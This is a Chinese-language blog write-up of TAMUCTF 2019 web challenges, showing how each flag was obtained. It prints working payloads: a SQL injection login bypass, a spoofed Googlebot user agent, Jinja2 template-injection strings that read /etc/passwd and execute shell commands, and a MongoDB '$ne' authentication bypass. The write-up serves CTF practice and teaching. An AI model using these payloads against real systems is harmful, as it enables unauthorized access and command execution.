TAMUCTF-部分web解析
SherlockLee CTF 5943浏览 · 2019-03-12 01:19

TAMUCTF-部分web解析

这次的这个比赛难度还是有些梯度的,有些知识点想到了,就能出来了,后面两道web题没有想到考的什么就没有做出来。

Not Another SQLi Challenge

(http://web1.tamuctf.com)[http://web1.tamuctf.com]


标题写着sqli chanllenge,很明显就是sql注入了,直接上payload

username=1&password=-1' or 1=1 #

flag:gigem{f4rm3r5_f4rm3r5_w3'r3_4ll_r16h7}

Robots Rule

(http://web5.tamuctf.com)[http://web5.tamuctf.com]
打开链接,扫一下,可以看见有robot.php,robots.txt文件,访问一下

User-agent: *

WHAT IS UP, MY FELLOW HUMAN!
HAVE YOU RECEIVED SECRET INFORMATION ON THE DASTARDLY GOOGLE ROBOTS?!
YOU CAN TELL ME, A FELLOW NOT-A-ROBOT!

看懂Google robots,这里我们应该想到更改代理,伪造googlebot,直接扔一个代理网站
https://developers.whatismybrowser.com/useragents/explore/software_name/googlebot/?order_by=operating_system_name
设置好代理,访问robots.php
得到flag:gigem{be3p-bOop_rob0tz_4-lyfe}

Many Gig'ems to you!

(http://web7.tamuctf.com)[http://web7.tamuctf.com]
这道题就不想吐槽了,就是在几个网页源码和cookie中找到字符串进行拼接得到flag
flag:gigem{flag_in_source_and_cookies}

Science!

(http://web3.tamuctf.com)[http://web3.tamuctf.com]
这道题打开链接,看源码,可以看到Flask引人注目


由此我们可以想到ssti,{{7*7}}测试一波

可以确定就是Flask/jinja2 模板注入
payload:

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}

{{''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('ls').read()")}}

{{ ''.__class__.__mro__[2].__subclasses__()[40]('./flag.txt').read() }}

flag:gigem{5h3_bl1nd3d_m3_w17h_5c13nc3}
模板注入的具体分析可以看我的一篇(文章)[http://www.sherlocklee.top/2018/12/09/%E6%B3%A8%E5%85%A5/ssti/]

Login App

(http://web4.tamuctf.com)[http://web4.tamuctf.com]
打开链接就是一片绿,一个登录框,随便输入点弹了一个警示框

进行抓包,发现是参数传递传入是json格式,于是大胆猜测一下是Nosql 注入,测试

果然就是MongoDb
payload:

{"username":"admin","password":{"$ne":"1"}}

flag:gigem{n0_sql?_n0_pr0bl3m_8a8651c31f16f5dea}

总结

这次ctf的题目总体来说不是很难,只要想到考的知识点了,这道题就出来,web中bucket那道题好像是和亚马逊的服务器有关,因为没有购买过,就没有去做,最后两道题真没有什么思路。总的来说这次的ctf很符合我这样的小白,往大佬路过就行,勿喷。

7 条评论
某人
表情
可输入 255